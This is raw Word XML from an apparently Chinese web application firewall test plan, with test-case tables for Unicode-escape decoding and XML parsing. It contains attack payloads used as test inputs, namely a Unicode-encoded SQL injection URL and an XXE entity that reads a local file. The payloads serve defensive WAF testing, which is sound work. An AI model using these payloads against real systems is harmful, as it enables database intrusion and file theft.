              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功识别编码后的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:bookmarkEnd w:id="100"/>
            <w:bookmarkEnd w:id="101"/>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164399" name="Picture 385164399"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="onesix_event_854d8640e56f41738b527f1eabcb2c80_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId47"/>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400" name="Picture 385164400"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="onesix_event_854d8640e56f41738b527f1eabcb2c80_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId48"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7980E7A9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4C669643">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="169F54B2">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3C43324">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="614424AC">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0E3FB214">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3C9F69B4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4AA70052">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="18EAAE64">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E3102A6">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="102" w:name="_Toc21077811"/>
      <w:bookmarkStart w:id="103" w:name="_Toc81916114"/>
      <w:bookmarkStart w:id="104" w:name="_Toc1284612300"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>斜杠反转义</w:t>
      </w:r>
      <w:bookmarkEnd w:id="102"/>
      <w:bookmarkEnd w:id="103"/>
      <w:bookmarkEnd w:id="10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73C2690">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="393F8FB8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="56795198">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>U</w:t>
            </w:r>
            <w:r>
              <w:t>nicode Escape</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>解码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="662CAC32">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="29A01CD5">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="7E7EEBE5">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造U</w:t>
            </w:r>
            <w:r>
              <w:t>nicode Escape</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编码后的攻击请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="754A04A9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5AD6EBAE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="021C532C">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13AF741D">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D0627B2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行U</w:t>
            </w:r>
            <w:r>
              <w:t>nicode</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>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w:t>
            </w:r>
            <w:bookmarkStart w:id="105" w:name="OLE_LINK4"/>
            <w:bookmarkStart w:id="106" w:name="OLE_LINK3"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/?value=%u0073%u0065%u006c%u0065%u0063%u0074+1+from+t%23</w:t>
            </w:r>
            <w:bookmarkEnd w:id="105"/>
            <w:bookmarkEnd w:id="106"/>
          </w:p>
          <w:p w14:paraId="002DBA20">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="23"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否对攻击进行拦截并记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2D15C69F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="33A1B996">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5E5990D3">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功识别编码后的攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164401" name="Picture 385164401"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="backslash_event_26d798b68b0046a5b6dfd2a6f89b2b95_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId49"/>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402" name="Picture 385164402"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="backslash_event_26d798b68b0046a5b6dfd2a6f89b2b95_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId50"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="11A2C0FF">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="37717EAE">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1815A68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EA3BAB9">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2BD2A757">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B6A90FE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="524938B0">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5E109EAA">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2A3F1251">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50AE6F5D">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc21077812"/>
      <w:bookmarkStart w:id="108" w:name="_Toc81916115"/>
      <w:bookmarkStart w:id="109" w:name="_Toc1825822809"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML解析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
      <w:bookmarkEnd w:id="108"/>
      <w:bookmarkEnd w:id="10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4370F3F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="4EF316A1">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5EB80224">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>XML解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="723E0C9D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5F50BA81">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="370FBFCE">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造XML的请求发送至WAF，WAF应成功解析并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="3670BCDA">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5176C783">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="54D0DCC2">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实server；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6BB1D517">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将WEB流量牵引至WAF检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2048D2A9">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将XML格式数据添加到请求body中发送到服务器，如在body中添加如下数据：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24C66840">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="420" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>&lt;?xml version="1.0" encoding="utf-8"?&gt; &lt;!DOCTYPE root [&lt;!ENTITY file SYSTEM "file:///c://TEST.txt"&gt;]&gt; &lt;root&gt;&amp;file;&lt;/root&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6A9A2455">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="24"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被拦截，查看WAF是否对攻击进行拦截并记录攻击日志并观察payload是否解析成功。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="5F8C2243">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E09C739">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="782C88E1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
